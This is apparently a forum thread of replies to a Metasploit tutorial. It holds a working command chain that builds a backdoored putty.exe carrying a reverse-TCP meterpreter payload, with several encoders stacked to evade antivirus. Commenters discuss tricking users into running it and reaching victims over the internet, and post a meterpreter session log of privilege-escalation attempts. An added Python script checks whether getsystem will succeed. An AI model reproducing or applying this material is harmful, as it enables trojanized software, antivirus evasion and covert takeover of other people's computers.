Wouldn't hurt to include a link to Metasploit Unleashed at the bottom of the guide to point beginners to the right place to take their follow-up learning.
Metasploit Unleashed - Mastering the Framework
So you like to use truecrypt.exe, nice lol, one of a few that work nicely.
For a great tutorial series on Metasploit, Google "metasploit megaprimer securitytube"; best I've seen.
Actually the -k option is what I am specifically referring to with my backdooring comment. As this is a client-side attack, tricking/social-engineering the user is everything, so keeping the backdoored exe working can be key sometimes. Not all executables work as templates with the -k option, or possibly even as templates in the first place.
Also bear in mind that this example code here did not pass my current Avast. I am moving this week and don't have time to re-work the encoding so it does. It did formerly; however, the executable made with this multi-encoding command string has been uploaded to VirusTotal for testing, as really the command was simple for testing the workings of running multiple encoders. I also developed this particular string some time ago.
The code in this case is simply an example that, yes, multiple encoders can still be used when backdooring an exe while still keeping the template exe working.
Again, when running it with this post, Avast did detect the exe and disposed of it. With Avast off I am able to get a meterpreter session started. Of course, modify the IP address and port as needed.
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26 LPORT=1417 R \
  | msfencode -e x86/shikata_ga_nai -c 3 -t raw \
  | msfencode -e x86/call4_dword_xor -c 4 -t raw \
  | msfencode -e x86/fnstenv_mov -c 5 -t raw \
  | msfencode -e x86/countdown -c 4 -t raw \
  | msfencode -e x86/shikata_ga_nai -c 16 -t exe -x /root/putty.exe -k -o /root/putty-backdoored.exe
I know this question lies totally outside the topic, but do the classic Metasploit payloads and exploits work for Win7 target platforms?
Hi, very useful tutorial! I used to use SET for simplicity, but this is just great, and not that hard.
I have some questions though:
- everything runs smoothly when on the same network, but how can I use it over the internet? I have two networks, two PCs. When I try this using my public IP, it just fails and Metasploit binds to 0.0.0.0... I tried allowing connections from outside through specific ports on my router, but same result...
Any ideas, people?
Edit: never mind my post, it's running smoothly now! I didn't know 0.0.0.0 meant all interfaces. As for port forwarding not working, it was just some router firewall I got rid of, and forwarding was the right way to do it!
I didn't think getsystem worked on x64 Windows 7? I also get a lot of BSODs in my testing when getting system privs... I don't understand how you did that?
I don't see this even working on x32.
Update: this is UAC blocking access; with UAC disabled this is no longer an issue. I am still stuck on how to disable UAC..?
Code:
meterpreter > sysinfo
Computer: WIN-MSUB6TKFKFA
OS      : Windows 7 (Build 7600, ).
Arch    : x86
Language: en_US
meterpreter > ps
...
608 explorer.exe x86 1 WIN-MSUB6TKFKFA\user C:\Windows\Explorer.EXE
meterpreter > migrate 608
[*] Migrating to 608...
[*] Migration completed successfully.
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
meterpreter > getsystem -t 1
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > getsystem -t 2
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > getsystem -t 3
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > getsystem -t 4
^C[-] Error running command getsystem: Interrupt
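The getprivs listing in the post above is the tell: a token carrying only SeShutdownPrivilege, SeChangeNotifyPrivilege and SeUndockPrivilege is the filtered token UAC hands a logged-on user, which is why the service-based getsystem techniques all answer "Access is denied". The script below is an added example, not code from the thread or from Metasploit: it parses a pasted getprivs dump and reports whether the token looks elevated before you spend time on getsystem. The list of privileges treated as markers of an elevated or service token (SeDebugPrivilege, SeImpersonatePrivilege and friends) is my assumption based on standard Windows privilege assignments, and the sample dump is constructed from the output in the post.

```python
"""Triage a meterpreter `getprivs` dump before calling getsystem.

Added example, not from the thread or from Metasploit. Parses the
privilege block that getprivs prints and decides whether the session's
token looks like a UAC-filtered standard-user token (as in the post) or
an elevated one on which getsystem's service techniques have a chance.
"""
import re
from typing import Dict, Set

# Assumption (mine, not from the page): these privileges only appear on an
# elevated (high-integrity/admin) token or a service account. A token
# without any of them is the filtered token UAC gives an interactive user.
ELEVATED_MARKERS = {
    "SeDebugPrivilege",
    "SeImpersonatePrivilege",
    "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
}

# Constructed sample: the getprivs block from the post, one entry per line.
SAMPLE_GETPRIVS = """\
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
meterpreter >
"""

# One Se*Privilege name on a line by itself; banner and prompt lines are ignored.
PRIV_RE = re.compile(r"^\s*(Se[A-Za-z]+Privilege)\s*$", re.M)


def parse_getprivs(text: str) -> Set[str]:
    """Return the set of Se*Privilege names found in a getprivs dump."""
    return set(PRIV_RE.findall(text))


def assess_token(privs: Set[str]) -> Dict[str, object]:
    """Classify a privilege set as elevated or UAC-filtered."""
    markers = sorted(privs & ELEVATED_MARKERS)
    elevated = bool(markers)
    if elevated:
        advice = "elevated token: getsystem service techniques (-t 1..3) are worth trying"
    else:
        advice = ("UAC-filtered/standard-user token: getsystem -t 1..3 will be "
                  "denied; get an elevated session first")
    return {
        "privilege_count": len(privs),
        "elevated_markers": markers,
        "looks_elevated": elevated,
        "advice": advice,
    }


def triage(text: str) -> Dict[str, object]:
    """Parse a pasted getprivs dump and assess it in one call."""
    return assess_token(parse_getprivs(text))


if __name__ == "__main__":
    for key, value in triage(SAMPLE_GETPRIVS).items():
        print(f"{key}: {value}")
```

Paste any getprivs output into `triage()`; for the post's dump it reports three privileges, no elevated markers and the advice to get an elevated session before retrying getsystem.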
Very good tutorial, and thanks for sharing this nice work.
Hi everyone. I'm Italian, so my English isn't correct xD
So... I have a problem with meterpreter: when I create it, it's OK.
In LHOST I set my external address and in msfconsole my internal address, but when another computer (not on my LAN) opens the file, nothing happens; msfconsole receives nothing. Why?
I do everything correctly, but... I don't know.
Can anyone help me?
Thanks
Again: sorry for my bad English
TheAppleMan